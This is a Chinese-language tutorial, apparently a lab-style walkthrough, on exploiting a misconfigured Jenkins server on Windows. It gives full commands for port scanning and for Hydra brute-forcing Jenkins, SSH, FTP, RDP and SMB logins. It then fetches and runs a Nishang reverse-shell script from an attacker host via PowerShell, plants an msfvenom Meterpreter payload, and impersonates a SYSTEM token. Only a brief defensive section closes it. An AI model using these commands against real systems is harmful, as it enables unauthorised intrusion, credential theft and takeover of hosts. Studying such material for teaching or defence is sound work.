Jenkins安全配置错误漏洞利用与权限提升教学文档<\/h1>

1. 初始信息收集与扫描<\/h2>

1.1 目标探测<\/h3>
目标机器不响应ICMP ping请求，因此需要使用-Pn<\/code>参数绕过ping探测。<\/p>
nmap -Pn <目标IP>
<\/span><\/span><\/code><\/pre>1.2 端口扫描技术<\/h3>
推荐使用RustScan进行快速TCP连接扫描：<\/p>
rustscan -a <目标IP> -- -sT
<\/span><\/span><\/code><\/pre>Nmap高级扫描选项：<\/p>

-sC<\/code>：使用默认Nmap脚本进行扫描<\/li>
-sV<\/code>：扫描已发现服务的版本<\/li>
-sS<\/code>：TCP SYN端口扫描（半开放扫描）<\/li>
-T<0-5><\/code>：时间模板（T0最慢，T5最快）<\/li>
-A<\/code>：启用操作系统检测、版本检测、脚本扫描和跟踪路由<\/li>
<\/ul>
完整扫描命令示例：<\/p>
nmap -Pn -sS -sV -sC -T4 -A <目标IP>
<\/span><\/span><\/code><\/pre>2. Jenkins登录爆破<\/h2>
2.1 识别登录表单参数<\/h3>
使用Burp Suite或浏览器开发者工具分析Jenkins登录请求：<\/p>

确定HTTP方法（POST）<\/li>
识别参数名（通常为j_username<\/code>和j_password<\/code>）<\/li>
确定错误响应特征（如包含"Invalid username or password"）<\/li>
<\/ul>
2.2 Hydra爆破配置<\/h3>
基本语法：<\/p>
hydra -l <用户名> -P <密码字典> <目标IP> <服务>
<\/span><\/span><\/code><\/pre>Jenkins特定爆破命令：<\/p>
hydra -s 8080<\/span> -L user.txt -P passwd.txt <目标IP> http-post-form "\/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"<\/span> -f -vV -o login_brute_force.txt
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-s 8080<\/code>：指定非标准端口<\/li>
-L user.txt<\/code>：用户名字典<\/li>
-P passwd.txt<\/code>：密码字典<\/li>
http-post-form<\/code>：指定HTTP POST表单攻击<\/li>
-f<\/code>：找到第一个有效凭证后停止<\/li>
-vV<\/code>：详细输出<\/li>
-o<\/code>：保存结果到文件<\/li>
<\/ul>
2.3 其他服务爆破示例<\/h3>
SSH爆破：<\/p>
hydra -L user.txt -P passwd.txt -vV -o ssh.log <目标IP> ssh
<\/span><\/span><\/code><\/pre>FTP爆破：<\/p>
hydra -l mark -P \/usr\/share\/wordlists\/rockyou.txt <目标IP> ftp
<\/span><\/span><\/code><\/pre>RDP爆破：<\/p>
hydra -l administrator -P 密码字典 <目标IP> rdp
<\/span><\/span><\/code><\/pre>SMB爆破：<\/p>
hydra -l administrator -P 密码字典 <目标IP> smb
<\/span><\/span><\/code><\/pre>3. 初始访问获取<\/h2>
3.1 使用Nishang获取反向Shell<\/h3>

下载Nishang的Invoke-PowerShellTcp脚本：<\/li>
<\/ol>
wget https:<\/span>\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1
<\/span><\/span><\/code><\/pre>
在攻击机设置监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
修改脚本末尾添加连接命令：<\/li>
<\/ol>
Invoke-PowerShellTcp -Reverse -IPAddress <攻击机<\/span>IP> -Port 4444
<\/span><\/span><\/code><\/pre>
通过Jenkins执行脚本：<\/li>
<\/ol>
powershell iex (New-Object Net.WebClient).DownloadString('http:\/\/<攻击机IP>\/Invoke-PowerShellTcp.ps1'<\/span>)
<\/span><\/span><\/code><\/pre>4. Shell升级与后渗透<\/h2>
4.1 升级到Meterpreter<\/h3>

生成Meterpreter payload：<\/li>
<\/ol>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span>5555<\/span> -f exe > shell.exe
<\/span><\/span><\/code><\/pre>
在攻击机启动Metasploit监听：<\/li>
<\/ol>
msfconsole
<\/span><\/span>use exploit\/multi\/handler
<\/span><\/span>set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST <攻击机IP>
<\/span><\/span>set LPORT 5555<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>
在目标机下载并执行payload：<\/li>
<\/ol>
(New-Object Net.WebClient).DownloadFile('http:\/\/<攻击机IP>\/shell.exe'<\/span>, 'C:\Users\Public\shell.exe'<\/span>)
<\/span><\/span>Start-Process 'C:\Users\Public\shell.exe'<\/span>
<\/span><\/span><\/code><\/pre>4.2 令牌窃取提权<\/h3>

在Meterpreter中检查权限：<\/li>
<\/ol>
getuid
<\/span><\/span><\/code><\/pre>
列出可用令牌：<\/li>
<\/ol>
use incognito
<\/span><\/span>list_tokens -u
<\/span><\/span><\/code><\/pre>
模拟高权限令牌：<\/li>
<\/ol>
impersonate_token "NT AUTHORITY\\SYSTEM"<\/span>
<\/span><\/span><\/code><\/pre>
验证提权：<\/li>
<\/ol>
getuid
<\/span><\/span><\/code><\/pre>5. 防御建议<\/h2>
5.1 Jenkins安全配置<\/h3>

禁用匿名访问<\/li>
使用强密码策略<\/li>
限制构建权限<\/li>
定期更新Jenkins及插件<\/li>
启用安全矩阵和项目矩阵授权<\/li>
<\/ol>
5.2 系统层面防御<\/h3>

限制服务账户权限<\/li>
启用Windows Defender Credential Guard<\/li>
配置本地安全策略限制令牌模拟<\/li>
监控异常进程创建和网络连接<\/li>
实施最小权限原则<\/li>
<\/ol>
6. 参考资源<\/h2>

Nishang GitHub仓库：https:\/\/github.com\/samratashok\/nishang<\/li>
Metasploit框架文档：https:\/\/www.metasploit.com\/<\/li>
Jenkins安全指南：https:\/\/www.jenkins.io\/doc\/book\/security\/<\/li>
Hydra使用手册：https:\/\/github.com\/vanhauser-thc\/thc-hydra<\/li>
<\/ol>